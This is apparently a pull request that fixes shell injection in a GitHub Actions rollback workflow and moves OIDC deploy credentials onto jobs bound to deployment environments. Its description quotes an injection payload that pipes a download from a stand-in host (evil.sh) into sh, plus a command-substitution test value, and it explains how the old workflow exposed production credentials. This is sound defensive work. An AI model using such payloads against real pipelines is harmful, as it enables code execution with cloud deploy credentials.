### PR TITLE
fix(ci): stop interpolating dispatch inputs into rollback run blocks

### DIFF
--- a/.github/workflows/README.md
+++ b/.github/workflows/README.md
@@ -378,9 +378,15 @@ Quickly rollback to a previous deployment version by redeploying a known-good Do
 ### Jobs
 
 1. **Validate** - Validate image tag and construct image URI
-2. **Verify Image** - Confirm image exists in registry
-3. **Rollback** - Deploy previous image with Terraform
-4. **Summary** - Create audit record
+2. **Rollback** - Confirm the image exists in the registry, then deploy it with Terraform
+3. **Summary** - Create audit record
+
+Image existence is verified *inside* each rollback job rather than in a
+standalone job. A separate verify job would have to assume the same cloud
+deploy role while carrying no `environment:` binding, which is exactly the
+ungated-but-credentialed shape that made the workflow exploitable. The
+tradeoff is that a rollback to a nonexistent tag now fails after the
+environment approval rather than before it.
 
 ### Triggers
 

--- a/.github/workflows/rollback.yml
+++ b/.github/workflows/rollback.yml
@@ -11,8 +11,16 @@
 
 name: Rollback Deployment
 
+# Least privilege by default: only the jobs that actually authenticate to a
+# cloud provider get `id-token: write`, and every one of those jobs is bound to
+# a deployment environment, so no OIDC token can be minted by a job outside the
+# environment's protection rules.
+#
+# The binding is necessary but not sufficient: GitHub auto-creates a referenced
+# environment on first use with NO protection rules. The `<cloud>-<env>-rollback`
+# environments must therefore be configured with required reviewers in repo
+# settings for the approval gate to actually stop anything.
 permissions:
-  id-token: write
   contents: read
 
 on:
@@ -46,8 +54,9 @@ jobs:
     name: Validate Rollback
     runs-on: ubuntu-latest
     timeout-minutes: 5
+    permissions:
+      contents: read
     outputs:
-      is_valid: ${{ steps.check.outputs.is_valid }}
       image_uri: ${{ steps.check.outputs.image_uri }}
 
     steps:
@@ -59,148 +68,116 @@ jobs:
       - name: Validate inputs
         id: check
         env:
+          CLOUD: ${{ inputs.cloud }}
+          IMAGE_TAG: ${{ inputs.image_tag }}
           ECR_REPOSITORY: ${{ vars.ECR_REPOSITORY }}
+          AWS_ACCOUNT_ID: ${{ vars.AWS_ACCOUNT_ID }}
+          AWS_REGION: ${{ vars.AWS_REGION || 'us-east-1' }}
+          GCP_REGION: ${{ vars.GCP_REGION || 'us-central1' }}
+          GCP_PROJECT_ID: ${{ secrets.GCP_PROJECT_ID }}
+          ARTIFACT_REGISTRY_REPO: ${{ vars.ARTIFACT_REGISTRY_REPO || 'cudly' }}
+          ACR_NAME: ${{ vars.ACR_NAME || 'cudlyacr' }}
         run: |
-          IS_VALID=true
-          IMAGE_URI=""
+          set -euo pipefail
 
-          # Validate image tag format
-          if [[ ! "${{ inputs.image_tag }}" =~ ^[a-zA-Z0-9._-]+$ ]]; then
-            echo "❌ Invalid image tag format"
-            IS_VALID=false
+          # `env:` entries whose expression renders empty are exported empty,
+          # but normalise anyway so `set -u` can never abort a rollback on an
+          # unset optional repository variable.
+          ECR_REPOSITORY="${ECR_REPOSITORY:-}"
+          AWS_ACCOUNT_ID="${AWS_ACCOUNT_ID:-}"
+          GCP_PROJECT_ID="${GCP_PROJECT_ID:-}"
+
+          # The tag is embedded in image URIs that later steps hand to the cloud
+          # CLIs, so reject anything outside the registry-safe character set here
+          # rather than downstream. Constraining the tag also keeps the operator-
+          # supplied half of the $GITHUB_OUTPUT write below free of newlines; the
+          # rest of the URI comes from admin-controlled repository variables.
+          if [[ ! "$IMAGE_TAG" =~ ^[a-zA-Z0-9._-]+$ ]]; then
+            echo "::error::Invalid image tag format: only [a-zA-Z0-9._-] are allowed"
+            exit 1
           fi
 
           # Construct image URI based on cloud provider
-          case "${{ inputs.cloud }}" in
+          case "$CLOUD" in
             aws-lambda|aws-fargate)
               if [ -z "$ECR_REPOSITORY" ]; then
-                echo "❌ ECR_REPOSITORY repository variable is not set; refusing to guess the repo name"
-                IS_VALID=false
-              else
-                IMAGE_URI="${{ vars.AWS_ACCOUNT_ID }}.dkr.ecr.${{ vars.AWS_REGION || 'us-east-1' }}.amazonaws.com/${ECR_REPOSITORY}:${{ inputs.image_tag }}"
+                echo "::error::ECR_REPOSITORY repository variable is not set; refusing to guess the repo name"
+                exit 1
               fi
+              if [ -z "$AWS_ACCOUNT_ID" ]; then
+                echo "::error::AWS_ACCOUNT_ID repository variable is not set; refusing to guess the registry"
+                exit 1
+              fi
+              IMAGE_URI="${AWS_ACCOUNT_ID}.dkr.ecr.${AWS_REGION}.amazonaws.com/${ECR_REPOSITORY}:${IMAGE_TAG}"
               ;;
             gcp)
-              IMAGE_URI="${{ vars.GCP_REGION || 'us-central1' }}-docker.pkg.dev/${{ secrets.GCP_PROJECT_ID }}/${{ vars.ARTIFACT_REGISTRY_REPO || 'cudly' }}/cudly:${{ inputs.image_tag }}"
+              if [ -z "$GCP_PROJECT_ID" ]; then
+                echo "::error::GCP_PROJECT_ID secret is not set; refusing to guess the project"
+                exit 1
+              fi
+              IMAGE_URI="${GCP_REGION}-docker.pkg.dev/${GCP_PROJECT_ID}/${ARTIFACT_REGISTRY_REPO}/cudly:${IMAGE_TAG}"
               ;;
             azure)
-              IMAGE_URI="${{ vars.ACR_NAME || 'cudlyacr' }}.azurecr.io/cudly:${{ inputs.image_tag }}"
+              IMAGE_URI="${ACR_NAME}.azurecr.io/cudly:${IMAGE_TAG}"
               ;;
             *)
-              echo "❌ Unknown cloud provider"
-              IS_VALID=false
+              echo "::error::Unknown cloud provider: $CLOUD"
+              exit 1
               ;;
           esac
 
-          echo "is_valid=$IS_VALID" >> $GITHUB_OUTPUT
-          echo "image_uri=$IMAGE_URI" >> $GITHUB_OUTPUT
+          echo "image_uri=$IMAGE_URI" >> "$GITHUB_OUTPUT"
 
       - name: Display rollback plan
+        env:
+          CLOUD: ${{ inputs.cloud }}
+          ENVIRONMENT: ${{ inputs.environment }}
+          IMAGE_TAG: ${{ inputs.image_tag }}
+          IMAGE_URI: ${{ steps.check.outputs.image_uri }}
+          REASON: ${{ inputs.reason }}
         run: |
-          echo "## Rollback Plan" >> $GITHUB_STEP_SUMMARY
-          echo "" >> $GITHUB_STEP_SUMMARY
-          echo "**Cloud:** ${{ inputs.cloud }}" >> $GITHUB_STEP_SUMMARY
-          echo "**Environment:** ${{ inputs.environment }}" >> $GITHUB_STEP_SUMMARY
-          echo "**Image Tag:** ${{ inputs.image_tag }}" >> $GITHUB_STEP_SUMMARY
-          echo "**Image URI:** ${{ steps.check.outputs.image_uri }}" >> $GITHUB_STEP_SUMMARY
-          echo "" >> $GITHUB_STEP_SUMMARY
+          set -euo pipefail
+          # The step summary renders as markdown, so fold the free-text reason
+          # onto one line: a dispatcher could otherwise embed newlines and forge
+          # headings or a fake result line in the rendered summary.
+          REASON="${REASON:-}"
+          REASON="${REASON//$'\n'/ }"
+          REASON="${REASON//$'\r'/ }"
+          {
+            echo "## Rollback Plan"
+            echo ""
+            echo "**Cloud:** $CLOUD"
+            echo "**Environment:** $ENVIRONMENT"
+            echo "**Image Tag:** $IMAGE_TAG"
+            echo "**Image URI:** $IMAGE_URI"
+            echo ""
 
-          if [ -n "${{ inputs.reason }}" ]; then
-            echo "**Reason:** ${{ inputs.reason }}" >> $GITHUB_STEP_SUMMARY
-            echo "" >> $GITHUB_STEP_SUMMARY
-          fi
+            if [ -n "$REASON" ]; then
+              echo "**Reason:** $REASON"
+              echo ""
+            fi
 
-          if [[ "${{ inputs.environment }}" == "prod" ]]; then
-            echo "⚠️ **WARNING:** Rolling back PRODUCTION environment!" >> $GITHUB_STEP_SUMMARY
-          fi
+            if [ "$ENVIRONMENT" = "prod" ]; then
+              echo "⚠️ **WARNING:** Rolling back PRODUCTION environment!"
+            fi
+          } >> "$GITHUB_STEP_SUMMARY"
 
-  # Verify image exists
-  verify-image:
-    name: Verify Image Exists
-    runs-on: ubuntu-latest
-    timeout-minutes: 10
-    needs: validate
-    if: needs.validate.outputs.is_valid == 'true'
-
-    steps:
-      - name: Configure credentials (AWS)
-        if: startsWith(inputs.cloud, 'aws')
-        uses: aws-actions/configure-aws-credentials@d979d5b3a71173a29b74b5b88418bfda9437d885 # v6.1.1
-        with:
-          role-to-assume: ${{ vars.AWS_ROLE_TO_ASSUME }}
-          aws-region: ${{ vars.AWS_REGION || 'us-east-1' }}
-
-      - name: Verify AWS image
-        if: startsWith(inputs.cloud, 'aws')
-        run: |
-          IMAGE_TAG="${{ inputs.image_tag }}"
-          REPO="${{ vars.ECR_REPOSITORY }}"
-
-          if [ -z "$REPO" ]; then
-            echo "❌ ECR_REPOSITORY repository variable is not set"
-            exit 1
-          fi
-
-          echo "Checking if image exists: $REPO:$IMAGE_TAG"
-
-          if aws ecr describe-images \
-              --repository-name $REPO \
-              --image-ids imageTag=$IMAGE_TAG \
-              --region ${{ vars.AWS_REGION || 'us-east-1' }} > /dev/null 2>&1; then
-            echo "✅ Image exists in ECR"
-          else
-            echo "❌ Image not found in ECR"
-            exit 1
-          fi
-
-      - name: Configure credentials (GCP)
-        if: inputs.cloud == 'gcp'
-        uses: google-github-actions/auth@7c6bc770dae815cd3e89ee6cdf493a5fab2cc093 # v3.0.0
-        with:
-          workload_identity_provider: ${{ vars.GCP_WORKLOAD_IDENTITY_PROVIDER }}
-          service_account: ${{ vars.GCP_SERVICE_ACCOUNT }}
-
-      - name: Verify GCP image
-        if: inputs.cloud == 'gcp'
-        run: |
-          gcloud artifacts docker images describe \
-            "${{ needs.validate.outputs.image_uri }}" \
-            && echo "✅ Image exists in Artifact Registry" \
-            || (echo "❌ Image not found in Artifact Registry" && exit 1)
-
-      - name: Configure credentials (Azure)
-        if: inputs.cloud == 'azure'
-        uses: azure/login@532459ea530d8321f2fb9bb10d1e0bcf23869a43 # v3.0.0
-        with:
-          client-id: ${{ secrets.AZURE_CLIENT_ID }}
-          tenant-id: ${{ secrets.AZURE_TENANT_ID }}
-          subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
-
-      - name: Verify Azure image
-        if: inputs.cloud == 'azure'
-        run: |
-          IMAGE_TAG="${{ inputs.image_tag }}"
-          ACR_NAME="${{ vars.ACR_NAME || 'cudlyacr' }}"
-
-          echo "Checking if image exists: $ACR_NAME/cudly:$IMAGE_TAG"
-
-          if az acr repository show-tags \
-              --name $ACR_NAME \
-              --repository cudly \
-              --output tsv | grep -q "^$IMAGE_TAG$"; then
-            echo "✅ Image exists in ACR"
-          else
-            echo "❌ Image not found in ACR"
-            exit 1
-          fi
+  # NOTE: image existence is verified inside each rollback job rather than in a
+  # standalone job. A separate verify job would have to assume the same
+  # cloud deploy role, and it could not be covered by the rollback
+  # environment's reviewer gate without prompting the operator for a second
+  # approval on every rollback.
 
   # Rollback AWS Lambda
   rollback-aws-lambda:
     name: Rollback AWS Lambda
     runs-on: ubuntu-latest
     timeout-minutes: 30
-    needs: [validate, verify-image]
+    needs: validate
     if: inputs.cloud == 'aws-lambda'
+    permissions:
+      id-token: write
+      contents: read
     environment:
       name: aws-lambda-${{ inputs.environment }}-rollback
 
@@ -216,6 +193,31 @@ jobs:
           role-to-assume: ${{ vars.AWS_ROLE_TO_ASSUME }}
           aws-region: ${{ vars.AWS_REGION || 'us-east-1' }}
 
+      - name: Verify image exists
+        env:
+          IMAGE_TAG: ${{ inputs.image_tag }}
+          ECR_REPOSITORY: ${{ vars.ECR_REPOSITORY }}
+          AWS_REGION: ${{ vars.AWS_REGION || 'us-east-1' }}
+        run: |
+          set -euo pipefail
+
+          if [ -z "${ECR_REPOSITORY:-}" ]; then
+            echo "::error::ECR_REPOSITORY repository variable is not set"
+            exit 1
+          fi
+
+          echo "Checking if image exists: $ECR_REPOSITORY:$IMAGE_TAG"
+
+          if aws ecr describe-images \
+              --repository-name "$ECR_REPOSITORY" \
+              --image-ids "imageTag=$IMAGE_TAG" \
+              --region "$AWS_REGION" > /dev/null 2>&1; then
+            echo "✅ Image exists in ECR"
+          else
+            echo "::error::Image not found in ECR"
+            exit 1
+          fi
+
       - name: Setup Terraform
         uses: hashicorp/setup-terraform@dfe3c3f87815947d99a8997f908cb6525fc44e9e # v4.0.1
         with:
@@ -226,21 +228,26 @@ jobs:
           TF_VAR_admin_email: ${{ secrets.ADMIN_EMAIL }}
           TF_BACKEND: ${{ secrets.TF_BACKEND_AWS }}
           ENVIRONMENT: ${{ inputs.environment }}
+          IMAGE_URI: ${{ needs.validate.outputs.image_uri }}
         run: |
+          set -euo pipefail
           printf '%s\nkey = "github-%s/terraform.tfstate"\n' "$TF_BACKEND" "$ENVIRONMENT" > /tmp/backend.tfbackend
           cd terraform/environments/aws
           terraform init -backend-config=/tmp/backend.tfbackend
 
           terraform apply -auto-approve \
-            -var-file="github-${{ inputs.environment }}.tfvars" \
-            -var="image_uri=${{ needs.validate.outputs.image_uri }}" \
+            -var-file="github-${ENVIRONMENT}.tfvars" \
+            -var="image_uri=${IMAGE_URI}" \
             -var="compute_platform=lambda"
 
       - name: Verify rollback
         run: |
+          set -euo pipefail
           sleep 30  # Wait for Lambda to update
           cd terraform/environments/aws
-          FUNCTION_URL=$(terraform output -raw lambda_function_url 2>/dev/null)
+          # Not silenced: if the output is missing, the real terraform error is
+          # what tells the operator why the rollback cannot be verified.
+          FUNCTION_URL=$(terraform output -raw lambda_function_url)
 
           if curl -f -s "$FUNCTION_URL/health" > /dev/null; then
             echo "✅ Rollback successful - health check passed"
@@ -254,8 +261,11 @@ jobs:
     name: Rollback AWS Fargate
     runs-on: ubuntu-latest
     timeout-minutes: 30
-    needs: [validate, verify-image]
+    needs: validate
     if: inputs.cloud == 'aws-fargate'
+    permissions:
+      id-token: write
+      contents: read
     environment:
       name: aws-fargate-${{ inputs.environment }}-rollback
 
@@ -271,6 +281,31 @@ jobs:
           role-to-assume: ${{ vars.AWS_ROLE_TO_ASSUME }}
           aws-region: ${{ vars.AWS_REGION || 'us-east-1' }}
 
+      - name: Verify image exists
+        env:
+          IMAGE_TAG: ${{ inputs.image_tag }}
+          ECR_REPOSITORY: ${{ vars.ECR_REPOSITORY }}
+          AWS_REGION: ${{ vars.AWS_REGION || 'us-east-1' }}
+        run: |
+          set -euo pipefail
+
+          if [ -z "${ECR_REPOSITORY:-}" ]; then
+            echo "::error::ECR_REPOSITORY repository variable is not set"
+            exit 1
+          fi
+
+          echo "Checking if image exists: $ECR_REPOSITORY:$IMAGE_TAG"
+
+          if aws ecr describe-images \
+              --repository-name "$ECR_REPOSITORY" \
+              --image-ids "imageTag=$IMAGE_TAG" \
+              --region "$AWS_REGION" > /dev/null 2>&1; then
+            echo "✅ Image exists in ECR"
+          else
+            echo "::error::Image not found in ECR"
+            exit 1
+          fi
+
       - name: Setup Terraform
         uses: hashicorp/setup-terraform@dfe3c3f87815947d99a8997f908cb6525fc44e9e # v4.0.1
         with:
@@ -281,14 +316,16 @@ jobs:
           TF_VAR_admin_email: ${{ secrets.ADMIN_EMAIL }}
           TF_BACKEND: ${{ secrets.TF_BACKEND_AWS }}
           ENVIRONMENT: ${{ inputs.environment }}
+          IMAGE_URI: ${{ needs.validate.outputs.image_uri }}
         run: |
+          set -euo pipefail
           printf '%s\nkey = "github-%s/terraform.tfstate"\n' "$TF_BACKEND" "$ENVIRONMENT" > /tmp/backend.tfbackend
           cd terraform/environments/aws
           terraform init -backend-config=/tmp/backend.tfbackend
 
           terraform apply -auto-approve \
-            -var-file="github-${{ inputs.environment }}.tfvars" \
-            -var="image_uri=${{ needs.validate.outputs.image_uri }}" \
+            -var-file="github-${ENVIRONMENT}.tfvars" \
+            -var="image_uri=${IMAGE_URI}" \
             -var="compute_platform=fargate"
 
   # Rollback GCP
@@ -296,8 +333,11 @@ jobs:
     name: Rollback GCP Cloud Run
     runs-on: ubuntu-latest
     timeout-minutes: 30
-    needs: [validate, verify-image]
+    needs: validate
     if: inputs.cloud == 'gcp'
+    permissions:
+      id-token: write
+      contents: read
     environment:
       name: gcp-${{ inputs.environment }}-rollback
 
@@ -313,6 +353,21 @@ jobs:
           workload_identity_provider: ${{ vars.GCP_WORKLOAD_IDENTITY_PROVIDER }}
           service_account: ${{ vars.GCP_SERVICE_ACCOUNT }}
 
+      - name: Verify image exists
+        env:
+          IMAGE_URI: ${{ needs.validate.outputs.image_uri }}
+        run: |
+          set -euo pipefail
+
+          echo "Checking if image exists: $IMAGE_URI"
+
+          if gcloud artifacts docker images describe "$IMAGE_URI" > /dev/null 2>&1; then
+            echo "✅ Image exists in Artifact Registry"
+          else
+            echo "::error::Image not found in Artifact Registry"
+            exit 1
+          fi
+
       - name: Setup Terraform
         uses: hashicorp/setup-terraform@dfe3c3f87815947d99a8997f908cb6525fc44e9e # v4.0.1
         with:
@@ -323,23 +378,29 @@ jobs:
           TF_VAR_admin_email: ${{ secrets.ADMIN_EMAIL }}
           TF_BACKEND: ${{ secrets.TF_BACKEND_GCP }}
           ENVIRONMENT: ${{ inputs.environment }}
+          IMAGE_URI: ${{ needs.validate.outputs.image_uri }}
+          GCP_PROJECT_ID: ${{ secrets.GCP_PROJECT_ID }}
         run: |
+          set -euo pipefail
           printf '%s\nprefix = "github-%s"\n' "$TF_BACKEND" "$ENVIRONMENT" > /tmp/backend.tfbackend
           cd terraform/environments/gcp
           terraform init -backend-config=/tmp/backend.tfbackend
 
           terraform apply -auto-approve \
-            -var-file="github-${{ inputs.environment }}.tfvars" \
-            -var="image_uri=${{ needs.validate.outputs.image_uri }}" \
-            -var="project_id=${{ secrets.GCP_PROJECT_ID }}"
+            -var-file="github-${ENVIRONMENT}.tfvars" \
+            -var="image_uri=${IMAGE_URI}" \
+            -var="project_id=${GCP_PROJECT_ID}"
 
   # Rollback Azure
   rollback-azure:
     name: Rollback Azure Container Apps
     runs-on: ubuntu-latest
     timeout-minutes: 30
-    needs: [validate, verify-image]
+    needs: validate
     if: inputs.cloud == 'azure'
+    permissions:
+      id-token: write
+      contents: read
     environment:
       name: azure-${{ inputs.environment }}-rollback
 
@@ -356,6 +417,29 @@ jobs:
           tenant-id: ${{ secrets.AZURE_TENANT_ID }}
           subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
 
+      - name: Verify image exists
+        env:
+          IMAGE_TAG: ${{ inputs.image_tag }}
+          ACR_NAME: ${{ vars.ACR_NAME || 'cudlyacr' }}
+        run: |
+          set -euo pipefail
+
+          echo "Checking if image exists: $ACR_NAME/cudly:$IMAGE_TAG"
+
+          # Look the tag up directly instead of listing tags and grepping.
+          # `show-tags` is paginated, so a valid but older tag can fall off the
+          # first page and be reported missing; and under `set -o pipefail` the
+          # early exit of `grep -q` can SIGPIPE the `az` process, failing the
+          # pipeline even on a match.
+          if az acr repository show \
+              --name "$ACR_NAME" \
+              --image "cudly:$IMAGE_TAG" > /dev/null 2>&1; then
+            echo "✅ Image exists in ACR"
+          else
+            echo "::error::Image not found in ACR"
+            exit 1
+          fi
+
       - name: Setup Terraform
         uses: hashicorp/setup-terraform@dfe3c3f87815947d99a8997f908cb6525fc44e9e # v4.0.1
         with:
@@ -368,23 +452,26 @@ jobs:
           TF_VAR_key_vault_name: ${{ vars.KEY_VAULT_NAME }}
           TF_BACKEND: ${{ secrets.TF_BACKEND_AZURE }}
           ENVIRONMENT: ${{ inputs.environment }}
+          IMAGE_URI: ${{ needs.validate.outputs.image_uri }}
         run: |
+          set -euo pipefail
           printf '%s\nkey = "github-%s.terraform.tfstate"\n' "$TF_BACKEND" "$ENVIRONMENT" > /tmp/backend.tfbackend
           cd terraform/environments/azure
           terraform init -backend-config=/tmp/backend.tfbackend
 
           terraform apply -auto-approve \
-            -var-file="github-${{ inputs.environment }}.tfvars" \
-            -var="image_uri=${{ needs.validate.outputs.image_uri }}"
+            -var-file="github-${ENVIRONMENT}.tfvars" \
+            -var="image_uri=${IMAGE_URI}"
 
   # Summary
   summary:
     name: Rollback Summary
     runs-on: ubuntu-latest
     timeout-minutes: 10
+    permissions:
+      contents: read
     needs:
       - validate
-      - verify-image
       - rollback-aws-lambda
       - rollback-aws-fargate
       - rollback-gcp
@@ -392,61 +479,55 @@ jobs:
     if: always()
 
     steps:
-      - name: Post summary
+      - name: Determine rollback result
+        id: result
+        env:
+          CLOUD: ${{ inputs.cloud }}
+          RESULT_AWS_LAMBDA: ${{ needs.rollback-aws-lambda.result }}
+          RESULT_AWS_FARGATE: ${{ needs.rollback-aws-fargate.result }}
+          RESULT_GCP: ${{ needs.rollback-gcp.result }}
+          RESULT_AZURE: ${{ needs.rollback-azure.result }}
         run: |
-          echo "## Rollback Results" >> $GITHUB_STEP_SUMMARY
-          echo "" >> $GITHUB_STEP_SUMMARY
-          echo "**Cloud:** ${{ inputs.cloud }}" >> $GITHUB_STEP_SUMMARY
-          echo "**Environment:** ${{ inputs.environment }}" >> $GITHUB_STEP_SUMMARY
-          echo "**Image Tag:** ${{ inputs.image_tag }}" >> $GITHUB_STEP_SUMMARY
-          echo "**Timestamp:** $(date -u +%Y-%m-%dT%H:%M:%SZ)" >> $GITHUB_STEP_SUMMARY
-          echo "" >> $GITHUB_STEP_SUMMARY
+          set -euo pipefail
 
-          if [ -n "${{ inputs.reason }}" ]; then
-            echo "**Reason:** ${{ inputs.reason }}" >> $GITHUB_STEP_SUMMARY
-            echo "" >> $GITHUB_STEP_SUMMARY
-          fi
-
-          # Determine which job ran
-          RESULT=""
-          case "${{ inputs.cloud }}" in
-            aws-lambda)
-              RESULT="${{ needs.rollback-aws-lambda.result }}"
-              ;;
-            aws-fargate)
-              RESULT="${{ needs.rollback-aws-fargate.result }}"
-              ;;
-            gcp)
-              RESULT="${{ needs.rollback-gcp.result }}"
-              ;;
-            azure)
-              RESULT="${{ needs.rollback-azure.result }}"
-              ;;
+          case "$CLOUD" in
+            aws-lambda)  RESULT="$RESULT_AWS_LAMBDA" ;;
+            aws-fargate) RESULT="$RESULT_AWS_FARGATE" ;;
+            gcp)         RESULT="$RESULT_GCP" ;;
+            azure)       RESULT="$RESULT_AZURE" ;;
+            *)           RESULT="unknown" ;;
           esac
 
-          if [ "$RESULT" == "success" ]; then
-            echo "✅ **Rollback completed successfully!**" >> $GITHUB_STEP_SUMMARY
-          else
-            echo "❌ **Rollback failed. Status: $RESULT**" >> $GITHUB_STEP_SUMMARY
-            echo "Check the job logs for details." >> $GITHUB_STEP_SUMMARY
-            exit 1
-          fi
+          echo "result=$RESULT" >> "$GITHUB_OUTPUT"
 
       - name: Record rollback
+        env:
+          CLOUD: ${{ inputs.cloud }}
+          ENVIRONMENT: ${{ inputs.environment }}
+          IMAGE_TAG: ${{ inputs.image_tag }}
+          IMAGE_URI: ${{ needs.validate.outputs.image_uri }}
+          REASON: ${{ inputs.reason }}
+          RESULT: ${{ steps.result.outputs.result }}
+          PERFORMED_BY: ${{ github.actor }}
+          WORKFLOW_RUN: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}
         run: |
-          # Create rollback record for audit trail
-          cat <<EOF > rollback-record.json
-          {
-            "cloud": "${{ inputs.cloud }}",
-            "environment": "${{ inputs.environment }}",
-            "image_tag": "${{ inputs.image_tag }}",
-            "image_uri": "${{ needs.validate.outputs.image_uri }}",
-            "reason": "${{ inputs.reason }}",
-            "performed_by": "${{ github.actor }}",
-            "performed_at": "$(date -u +%Y-%m-%dT%H:%M:%SZ)",
-            "workflow_run": "${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}"
-          }
-          EOF
+          set -euo pipefail
+          REASON="${REASON:-}"
+
+          # Build the audit record with jq so every value is JSON-escaped by the
+          # tool. Interpolating them into a here-document would both break the
+          # JSON on a quote and let $(...) in an input execute as shell.
+          jq -n \
+            --arg cloud "$CLOUD" \
+            --arg environment "$ENVIRONMENT" \
+            --arg image_tag "$IMAGE_TAG" \
+            --arg image_uri "$IMAGE_URI" \
+            --arg reason "$REASON" \
+            --arg result "$RESULT" \
+            --arg performed_by "$PERFORMED_BY" \
+            --arg performed_at "$(date -u +%Y-%m-%dT%H:%M:%SZ)" \
+            --arg workflow_run "$WORKFLOW_RUN" \
+            '$ARGS.named' > rollback-record.json
 
           echo "Rollback record:"
           cat rollback-record.json
@@ -457,3 +538,46 @@ jobs:
           name: rollback-record-${{ github.run_id }}
           path: rollback-record.json
           retention-days: 365  # Keep rollback records for 1 year
+
+      # Runs last so that a failed rollback still leaves the audit record above
+      # uploaded before this step fails the job.
+      - name: Post summary
+        env:
+          CLOUD: ${{ inputs.cloud }}
+          ENVIRONMENT: ${{ inputs.environment }}
+          IMAGE_TAG: ${{ inputs.image_tag }}
+          REASON: ${{ inputs.reason }}
+          RESULT: ${{ steps.result.outputs.result }}
+        run: |
+          set -euo pipefail
+          # Folded onto one line for the same reason as in the rollback plan:
+          # the summary is markdown and must not be forgeable from an input.
+          REASON="${REASON:-}"
+          REASON="${REASON//$'\n'/ }"
+          REASON="${REASON//$'\r'/ }"
+
+          {
+            echo "## Rollback Results"
+            echo ""
+            echo "**Cloud:** $CLOUD"
+            echo "**Environment:** $ENVIRONMENT"
+            echo "**Image Tag:** $IMAGE_TAG"
+            echo "**Timestamp:** $(date -u +%Y-%m-%dT%H:%M:%SZ)"
+            echo ""
+
+            if [ -n "$REASON" ]; then
+              echo "**Reason:** $REASON"
+              echo ""
+            fi
+
+            if [ "$RESULT" = "success" ]; then
+              echo "✅ **Rollback completed successfully!**"
+            else
+              echo "❌ **Rollback failed. Status: $RESULT**"
+              echo "Check the job logs for details."
+            fi
+          } >> "$GITHUB_STEP_SUMMARY"
+
+          if [ "$RESULT" != "success" ]; then
+            exit 1
+          fi


### PR DESCRIPTION
Closes #1542

## Both claims in the issue were live on current `origin/main` (3e9660d06)

**(a) Script injection — confirmed.** `${{ inputs.reason }}` and `${{ inputs.image_tag }}` (both free-text `type: string` dispatch inputs) were substituted into the shell source of `run:` blocks before bash parsed them. The `image_tag` regex guard was itself post-interpolation, so it validated nothing.

**(b) Approval-gate bypass — confirmed, and the mechanism is worse than "no environment on `validate`/`summary`".** `permissions: id-token: write` sat at workflow level, and the deleted `verify-image` job actively called `configure-aws-credentials` / `azure/login` / `google-github-actions/auth` while having **no** `environment:` binding. Its OIDC subject was `repo:<org/repo>:ref:refs/heads/main`, which `terraform/environments/aws/ci-cd-permissions/role.tf:29` accepts independently of the `environment:*` subjects. So injected code ran in a job that legitimately held production deploy credentials and never touched a reviewer gate.

## What this PR does and does not fix — read this before trusting the gate

The issue described two controls. **Only the first is restored here, and I am not claiming otherwise.**

| control | status |
|---|---|
| **1. Eliminate the injection** | **DONE.** Zero `${{ }}` remain in any `run:` block (11 before). Verified by parsing the YAML and by executing the real run-blocks against hostile payloads. |
| **2. Restore the approval gate** | **NOT RESTORED — and it never existed.** `id-token: write` is now narrowed onto four environment-bound jobs, which is the correct shape. But those environments have no protection rules, so nothing approves anything. |

The narrowing is still worth doing: it is the precondition for a gate to mean anything, and it removes the ungated-but-credentialed job the exploit relied on. It is simply not, by itself, an approval control.

```
$ gh api repos/LeanerCloud/CUDly/environments
total_count: 5
aws-fargate-dev: protection_rules=[] | aws-fargate-staging: [] | azure-: [] | dev: [] | gcp-: []
```

**No environment in this repo has any protection rules**, none of the four `<cloud>-<env>-rollback` environments exists, and GitHub auto-creates a referenced environment *bare* on first use. The environments literally named `azure-` and `gcp-` are evidence that auto-create has already fired here, when an `${{ inputs.environment }}` rendered empty. Filed as **#1660**.

So: the p0 in #1542 — arbitrary code execution reaching production cloud credentials — is dead. The reviewer gate is a separate, previously-unnoticed gap that this PR surfaces rather than closes.

## Proof the injection is gone

Before, in `Record rollback` (the site the issue calls worst):

```yaml
cat <<EOF > rollback-record.json
  "reason": "${{ inputs.reason }}",
EOF
```

After:

```yaml
env:
  REASON: ${{ inputs.reason }}
run: |
  jq -n --arg reason "$REASON" ... '$ARGS.named' > rollback-record.json
```

Reproduced locally with `reason` = `$(echo RCE > /tmp/marker)` against faithful copies of both the heredoc site and the `Display rollback plan` if-block: **before** — marker created in both; **after** — no marker, the value is printed as literal text and lands in the JSON as a string.

Why the new form cannot execute: the value never appears in the script's source text. It arrives as a process environment variable, and `"$REASON"` is a quoted parameter expansion — bash performs no further parsing on the result, so metacharacters, `$(...)` and newlines are all inert data. `jq --arg` likewise binds the value as a JSON string rather than splicing it into a document.

One honesty note on the issue's example payload: `"; curl evil.sh | sh; #` works at the heredoc and most other sites, but at the `if [ -n "..." ]` site the `]`-terminating form leaves the compound command unparseable, so bash aborts before executing. Command substitution (`$(...)`) is the vector that works at *every* site, including that one. The severity is unchanged.

A scripted scan confirms **zero** `${{ }}` expressions remain inside any `run:` block in this file. Every other input reference was audited, not just `reason`.

## Changes

- Every input passed via `env:`, referenced as a quoted shell variable.
- Audit record built with `jq -n --arg` instead of an unquoted heredoc.
- `id-token: write` dropped to job level, granted only to the four environment-bound `rollback-*` jobs; `validate` and `summary` are `contents: read`.
- `verify-image` deleted (it was the ungated credentialed job); its check inlined into each gated rollback job.
- `image_tag` regex now runs against a shell variable, and a bad tag fails the job rather than setting an `is_valid` output that a later job had to remember to honour.
- Fail loud on unset `AWS_ACCOUNT_ID` / `GCP_PROJECT_ID` instead of building an image URI around an empty string; `set -euo pipefail` throughout.
- Azure tag lookup uses `az acr repository show --image` instead of grepping paginated `show-tags` through a pipe (`show-tags` can page a valid older tag off the first page, and under `pipefail` an early `grep -q` exit can SIGPIPE `az` and fail the check on a match).
- `reason` newlines folded before writing to `$GITHUB_STEP_SUMMARY`, which renders as markdown and could otherwise be made to forge a fake "Rollback completed successfully" line. The audit JSON keeps the value verbatim.

## Verification

| check | result |
|---|---|
| `actionlint` (shellcheck available) on pre-change file | **exit 1** |
| `actionlint` on updated file | **exit 0** |
| `${{ }}` inside any `run:` block | 0 |
| pre-commit hooks | passed |

`act` was not run; no dry run is claimed.

## Why existing scanning missed this

